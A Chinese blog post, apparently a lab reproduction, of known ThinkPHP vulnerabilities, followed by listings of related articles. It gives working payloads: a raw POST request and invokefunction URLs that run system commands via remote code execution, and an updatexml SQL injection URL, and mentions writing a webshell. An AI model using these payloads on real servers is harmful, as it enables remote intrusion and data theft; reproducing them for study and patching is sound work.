ThinkPHP历史漏洞复现

最新推荐文章于 2025-09-15 16:29:51 发布
原创 最新推荐文章于 2025-09-15 16:29:51 发布 · 522 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

1 ThinkPHP介绍

ThinkPHP 是一个快速、兼容而且简单的轻量级国产 PHP 开发框架,支持 windows/Unix/Linux 等服务器环境,很多CMS都是基于ThinkPHP二次开发的。ThinkPHP的页面特征如下:
ThinkPHP的历史漏洞很多,常见的有这几个:
  • ThinkPHP2 任意代码执行漏洞
  • ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
  • ThinkPHP5 5.0.23 远程代码执行漏洞
  • ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

2 漏洞发现与利用

首先介绍一个小工具:https://github.com/Lucifer1993/TPscan,可以初步判断是否存在历史的漏洞。

2.1 ThinkPHP5 5.0.23 远程代码执行漏洞

首先通过小工具初步检测漏洞
正式的利用漏洞,访问漏洞产生页面: http://192.168.159.141:8080/index.php?s=captcha
执行如下操作,改变get请求为POST,发送数据包: 
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

返回页面结果:

测试系统命令whoami
继续深入利用,写入shell

2.2 ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

先用小工具探测一下:

直接访问

http://192.168.159.141:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行如下语句:http://192.168.159.141:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.3 ThinkPHP5 SQL注入漏洞

使用小工具测:

{'vulnname': 'thinkphp_debug_index_ids_sqli', 'isvul': True, 'vulnurl': 'http://192.168.159.141/index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1'}

使用如下测试语句:http://192.168.159.141/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

安全学习交流群:687398569

Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2686
Thinkphp6.0.x反序列化漏洞复现
Thinkphp漏洞
weixin_43873557的博客
02-06 1162
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin
从0起步学习网络安全(学习篇):DAY11 Web中间件漏洞ThinkPHP漏洞
最新发布
Jiangbe-Boating
09-15 843
ThinkPHP是国内最流行的PHP框架之一,但存在多种高危漏洞,包括RCE、敏感信息泄露和本地文件包含等。文章介绍了框架特征识别方法,并详细复现了5.x RCE漏洞、敏感信息泄露漏洞和多语言文件包含漏洞的利用过程。针对这些漏洞,建议及时更新框架版本、加强代码审查、严格访问控制并定期进行安全检测。尽管官方已发布修复补丁,但仍有大量未更新系统面临风险。文章提供了完整的安全分析思路和修复方案,帮助开发者和运维人员提升系统安全性。
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2599
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
ThinkPHP历史漏洞
HAKUNAMATATATTA的博客
12-30 7147
Thinkphp 是一种开源框架。是一个由国人开发的支持windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。
thinkphp历史漏洞
weixin_30314813的博客
06-28 361
路由控制類RCE/think/App.php if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); } 變量覆蓋RCE/think/Request.php if (in...
Thinkphp历史漏洞复现
懂进攻知防守
07-26 2371
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms(内容管理系统)就是基于 thinkphp 二次开发的,如果 thinkphp 出现问题,会影响很多基于 thinkphp 开发的网站。 ...
【安全漏洞ThinkPHP 3.2.3 漏洞复现
2201_75857869的博客
03-03 2436
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
Thinkphp5.0 反序列化漏洞复现
feng的博客
03-11 2355
前言 环境创建: composer create-project topthink/think=5.0.14 thinkphp5.0.14 "require": { "php": ">=5.4.0", "topthink/framework": "5.0.14" }, composer update
ThinkPHP v6.0.x反序列化漏洞复现与分析
weixin_45794666的博客
03-02 1万+
thinkPHP v6.0.0-6.0.3反序列化漏洞复现与分析 环境搭建 初始环境,需要注意的是,新版v6基于PHP7.1+开发 php-7.2.9 ThinkPHP v6.0.3 使用composer进行安装 composer create-project topthink/think=6.0.3 tp6.0 ⚠️坑点,截止到2021/09/16 ,默认核心安装的为framework=v6.0.9 think-orm=2.0.44 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1614
Thinkphp漏洞复现
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5776
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 2421
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1690
Thinkphp2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
陈瘦瘦的迪迦的博客
12-08 2万+
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
thinkphp系列漏洞复现(组合拳-vulhub里的)
m0_58596609的博客
01-07 1630
thinkphp系列漏洞复现(组合拳)
ThinkPHP 日志信息泄露——漏洞复现
热门推荐
W小哥
02-20 2万+
一、漏洞简介 1、ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 2ThinkPHP默认安装后,也会在Runtime目录下生成日志 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log 日志存储结构是 :项目名\Runtime\Logs\Home\年份_月份_日期.log 注意: 日志信息非常详细
Thinkphp5.1.4漏洞复现
05-11
以下是漏洞复现的步骤: 1. 下载 ThinkPHP 5.1.4,创建一个名为 `demo` 的项目。 2. 在 `demo/application/index/controller` 目录下创建一个名为 `Index.php` 的控制器,添加以下代码: ```php namespace ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值